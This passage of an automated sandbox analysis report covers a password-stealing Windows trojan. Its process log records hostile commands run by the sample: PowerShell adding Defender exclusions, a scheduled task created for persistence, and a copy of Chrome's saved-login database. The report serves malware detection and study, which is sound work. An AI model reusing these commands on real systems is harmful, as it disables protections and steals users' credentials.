          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829730 NtQueryVirtualMemory,10_2_01829730
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829760 NtOpenProcess,10_2_01829760
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829770 NtSetInformationFile,10_2_01829770
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0182A770 NtOpenThread,10_2_0182A770
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018296D0 NtCreateKey,10_2_018296D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829610 NtEnumerateValueKey,10_2_01829610
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829650 NtQueryValueKey,10_2_01829650
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829670 NtQueryInformationProcess,10_2_01829670
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.426300401.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.430926613.0000000003027000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameReactionDiffusion.dllJ vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.440634324.00000000077B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.430926613.0000000002E6D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAads.dll* vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.430926613.0000000002E6D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameReactionDiffusion.dllJ vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.430926613.0000000002CB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameReactionDiffusion.dllJ vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438174775.0000000005410000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAads.dll* vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.430926613.0000000002C81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAads.dll* vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000000.385827333.0000000000A23000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefOac.exe( vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438259530.0000000005570000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameReactionDiffusion.dllJ vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.424513444.000000000A0B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefOac.exe( vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000002.431531509.00000000018DF000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: hkkRsa.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeReversingLabs: Detection: 23%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeJump to behavior
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hkkRsa.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmpE41B.tmp
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\hkkRsa.exe C:\Users\user\AppData\Roaming\hkkRsa.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmp22F9.tmp
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess created: C:\Users\user\AppData\Roaming\hkkRsa.exe C:\Users\user\AppData\Roaming\hkkRsa.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hkkRsa.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmpE41B.tmpJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmp22F9.tmpJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess created: C:\Users\user\AppData\Roaming\hkkRsa.exe C:\Users\user\AppData\Roaming\hkkRsa.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeFile created: C:\Users\user\AppData\Roaming\hkkRsa.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE41B.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/18@8/8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:60:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1648:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:492:120:WilError_01
          Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\479O54QF\479logrc.ini
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\OfficeJump to behavior
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 0000000F.00000000.477862889.00007FFA13021000.00000020.00000001.01000000.0000000B.sdmp
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 0000000F.00000000.477862889.00007FFA13021000.00000020.00000001.01000000.0000000B.sdmp
          Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000003.427644663.0000000001622000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000003.424015597.0000000001483000.00000004.00000020.00020000.00000000.sdmp, hkkRsa.exe, 0000000E.00000002.487071109.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.911668789.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.486692282.000000000496F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.911668789.0000000004DBF000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000003.427644663.0000000001622000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000003.424015597.0000000001483000.00000004.00000020.00020000.00000000.sdmp, hkkRsa.exe, 0000000E.00000002.487071109.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.911668789.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.486692282.000000000496F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.911668789.0000000004DBF000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: hkkRsa.exe, 0000000E.00000002.486732177.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, hkkRsa.exe, 0000000E.00000002.489051209.0000000002BE0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000010.00000002.911333276.0000000001330000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: fOac.pdbSHA256 source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000000.385827333.0000000000982000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000010.00000002.911442424.0000000004A68000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: hkkRsa.exe, 0000000E.00000002.486732177.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, hkkRsa.exe, 0000000E.00000002.489051209.0000000002BE0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000010.00000002.911333276.0000000001330000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: fOac.pdb source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000000.385827333.0000000000982000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000010.00000002.911442424.0000000004A68000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: eex.pdb source: explorer.exe, 0000000F.00000000.477862889.00007FFA13021000.00000020.00000001.01000000.0000000B.sdmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 0_2_0125FB10 pushad ; retf 0_2_0125FB11
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeCode function: 9_2_02E0FB10 pushad ; retf 9_2_02E0FB11
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeCode function: 9_2_02E0FB12 pushad ; retf 9_2_02E0FB11
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_004178D5 pushad ; iretd 10_2_004178DC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0041EA32 push ebp; ret 10_2_0041EA33
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_00417C0B push ss; iretd 10_2_00417C39
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0041D4D5 push eax; ret 10_2_0041D528
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_00417D4F push ebx; ret 10_2_00417D61
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0041D522 push eax; ret 10_2_0041D528
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0041D52B push eax; ret 10_2_0041D592
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0041E58D pushfd ; ret 10_2_0041E58E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0041D58C push eax; ret 10_2_0041D592
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_004167B4 push edx; retf 10_2_004167B5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0183D0D1 push ecx; ret 10_2_0183D0E4
          Source: initial sampleStatic PE information: section name: .text entropy: 7.772224469495988
          Source: initial sampleStatic PE information: section name: .text entropy: 7.772224469495988
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeFile created: C:\Users\user\AppData\Roaming\hkkRsa.exeJump to dropped file

          Boot Survival

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmpE41B.tmp

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
